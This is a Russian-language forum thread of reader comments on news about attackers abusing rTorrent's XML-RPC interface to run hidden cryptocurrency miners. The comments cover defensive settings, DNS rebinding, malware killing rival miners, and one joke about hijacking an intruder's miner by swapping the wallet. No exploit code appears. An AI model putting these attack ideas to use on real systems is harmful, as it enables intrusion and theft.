
> Если кто попало получает возможность его дёргать, то это проблема настройки системы,
> а не плохое API.

Если апи хреново работает в реальном мире - это хреновое апи.

> Но не весь. Демоны — это юниксвейно? А они обычно не используют
> stdin/stdout для работы.

У демонов никто и не кодит чудо-интерфейсы на stdin/out. Так что и вопрос не возникает.

Ответить | Правка | ^ к родителю #100 | Наверх | Cообщить модератору

90. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:29 
> Кстати, зачем вообще какому-то торренту уметь - exec ?

Без стремных RPC жизнь скучна. В трансмишне exec не было, но была настройка выполнения скрипта по завершении закачки. Это надеюсь понятно зачем, да? Но в конце концов и это тоже позволяет выполнить какую-нибудь забавную команду в системе.

> Сама возможность записать файл - рута тебе просто так не принесет, придется
> сильно повозиться.

Открыть список CVE и скачать сплойт? Во хакерье обленилось :)

> (уныло глядит на многоголовый xeon... 300 хешей максимум. Ну и чего их вот ломать?)

Так это с одного 300 хешей. А если бот найдет 1000 таких, уже 300 килохешей. Две старушки - уже рубль!

Ответить | Правка | ^ к родителю #27 | Наверх | Cообщить модератору

22. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 13:52 
А что ты собрался тут исправлять? Все работает так, как мы надизайнили (ц). Тут нечего исправлять, ну или по крайней мере все переделывать (к примеру, браузеры, добавлять настройки к DNS-ресолверам, ставить локальные прокси и так далее).
Ответить | Правка | ^ к родителю #13 | Наверх | Cообщить модератору

23. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +4 +/
Сообщение от Аноним (??) on 02-Мрт-18, 14:14 
>вначале пытается завершить процессы конкурирующих вредоносных систем майнинга, удаляя процессы по маскам "miner", "xmr", "wnTKYg", "imWBR" и "ddg"

ну вот, раньше вирусы на дисках место освобождали, сжимая и распаковывая программки на лету, теперь они еще друг друга будут уничтожать...
- Значит всем инфицированным скачать с торента наш антивирус.
- А запускать как?
- Запускать вам уже не надо...

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

25. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от Аноним (??) on 02-Мрт-18, 14:26 
Дожили
конкурирующие вредоносные системы майнинга
на компе подцепить можно

Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

41. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Диалектик on 02-Мрт-18, 19:05 
Воспринимай это как новый виток борьбы за безопасность ПО на машинах пользователей, кстати подкреплённый финансовым интересом, а значит крайне эффективный виток!
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

50. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +4 +/
Сообщение от Crazy Alex (ok) on 02-Мрт-18, 22:18 
Вирусы друг друга в винде, помнится, тоже выносили
Ответить | Правка | ^ к родителю #25 | Наверх | Cообщить модератору

67. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от ПупкинВасуасилий on 03-Мрт-18, 11:20 
Не помню такого, чтобы выносили. Черви, после заражения, которые в системе дыру патчили, были. А чтобы выносили друг друга не помню.
Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

91. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:32 
> Вирусы друг друга в винде, помнится, тоже выносили

Да и на всяких роутерах вирусы друг друга зачастую выпихивают, чтобы конкурент малину не портил. Кто логины закрывает, кто вулны патчит. Чтобы ресурс не накрылся и другим не достался.

Чем больше вирья тусит на ресурсе - тем быстрее он задолбает окружающих и его починят или отключат. Поэтому у хакерья конкуренция за халяву.

Ответить | Правка | ^ к родителю #50 | Наверх | Cообщить модератору

26. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 14:39 
А если использовать в network.scgi.open_port произвольный порт, вместо обычного 5000, поможет защититься?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

51. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Crazy Alex (ok) on 02-Мрт-18, 22:19 
Почти наверняка
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

82. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 20:35 
хотя нет, запрос идет не напрямую к rtorrent, поэтому  нужно поменять на хост, отличный от localhost  и/или путь /RPC2
Ответить | Правка | ^ к родителю #26 | Наверх | Cообщить модератору

30. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –5 +/
Сообщение от iZEN (ok) on 02-Мрт-18, 15:10 
А если просто не устанавливать и не использовать bash?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

32. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +3 +/
Сообщение от Аноним (??) on 02-Мрт-18, 15:44 
Автор заменит в скрипте bash на sh. Удачи в его выкидывании.
Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

47. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –5 +/
Сообщение от iZEN email(ok) on 02-Мрт-18, 21:48 
Думаете, автор догадается, что башизмы не везде работают?
Ответить | Правка | ^ к родителю #32 | Наверх | Cообщить модератору

55. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 23:25 
Там башизмов почти что нет, а что есть — не критично. Майнера всяко запустит.
Ответить | Правка | ^ к родителю #47 | Наверх | Cообщить модератору

59. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +2 +/
Сообщение от Led (ok) on 03-Мрт-18, 00:55 
> А если просто не устанавливать и не использовать bash?

Тебя маководы за это того... своим сделают.

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

94. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:38 
> А если просто не устанавливать и не использовать bash?

По-моему со сменой порта или авторизацией идея умнее разика так в три.

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

98. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 11:51 
>> А если просто не устанавливать и не использовать bash?
> По-моему со сменой порта или авторизацией идея умнее разика так в три.

Со сменой порта — точно иакая же глупая.

Ответить | Правка | ^ к родителю #94 | Наверх | Cообщить модератору

114. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 07-Мрт-18, 09:39 
> Со сменой порта — точно иакая же глупая.

Это в теории. А на практике делать портскан через DNS rebinding очень напряжно и с чем-то таким можно познакомиться разве что если кто-то очень принципиально задастся целью сломать именно вот этот вот компьютер, а не что-нибудь еще.

Ответить | Правка | ^ к родителю #98 | Наверх | Cообщить модератору

101. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –2 +/
Сообщение от Michael Shigorin email(ok) on 04-Мрт-18, 16:54 
> А если просто не устанавливать и не использовать bash?

Предпочитаете tcsh.exe?

Ответить | Правка | ^ к родителю #30 | Наверх | Cообщить модератору

102. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 20:41 
>> А если просто не устанавливать и не использовать bash?
> Предпочитаете tcsh.exe?

sh
причем именно отдельный, а не алиас на *ash

Хотя, в контексте новости - все "те же яйца, только в профиль".

Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

106. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от ыы on 05-Мрт-18, 21:38 
cmd
Ответить | Правка | ^ к родителю #101 | Наверх | Cообщить модератору

34. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –1 +/
Сообщение от Ващенаглухо (ok) on 02-Мрт-18, 15:51 
Что за хрень?, rtorrent запущен, но не открывает он портов на 127.1
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

36. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 02-Мрт-18, 16:08 
он открывает на том что написано в scgi.open_port, если там localhost, а в /etc/hosts последний Localhost ::1, будет только на нем
Ответить | Правка | ^ к родителю #34 | Наверх | Cообщить модератору

40. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –2 +/
Сообщение от Аноним (??) on 02-Мрт-18, 18:56 
рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

44. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от YetAnotherOnanym (ok) on 02-Мрт-18, 19:26 
> рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.

Щас прибежит юное модное дарование и объяснит тебе, что CLI - это настолько позапрошлый век, что его даже упоминать неприлично, а жизнь дана человеку не для того, чтобы тратить её на набирание команд на клавиатуре или правку конфигов.

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

45. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Аноним (??) on 02-Мрт-18, 19:37 
И правда, зачем учиться говорить, если можно обходиться жестами?
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

46. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  –2 +/
Сообщение от VimCoder on 02-Мрт-18, 19:41 
Программист не человек?
Ответить | Правка | ^ к родителю #44 | Наверх | Cообщить модератору

52. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +1 +/
Сообщение от Crazy Alex (ok) on 02-Мрт-18, 22:22 
Была бы не нужна, если б умел сортировку закачек. Нет, не 1...6, а по размеру, например. Или банально посмотреть, что сейчас отдаётся. Но его UI уж слишком минимален, да ещё имеет свойство адски лагать, если не выходит достучаться до UDP-трекера
Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

93. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:36 
> рторрент настолько гибкий и настраиваемый, что там веб морда накол не нужна.

А еще она дико тормозит и в ней решительно невозможно понять что вообще клиент делает. Поэтому смысл в таком интерфейсе лично для меня остался большой загадкой. Пользоваться им - мучительно и нерезультативно. Для батч обработки он тоже не годится, слишком интерактивный. Получилось нечто, ни два ни полтора.

Ответить | Правка | ^ к родителю #40 | Наверх | Cообщить модератору

69. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 03-Мрт-18, 11:31 
Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?
Ответить | Правка | ^ к родителю #0 | Наверх | Cообщить модератору

92. "Атака на системы с rTorrent для скрытого майнинга криптовалю..."  +/
Сообщение от Аноним (??) on 04-Мрт-18, 10:34 
> Если реализация такая кривая, можно ли украсть намайненое? Хотя бы часть?

Замени кошель на свой и перезапусти? И пусть себе майнит дальше :)

Ответить | Правка | ^ к родителю #69 | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру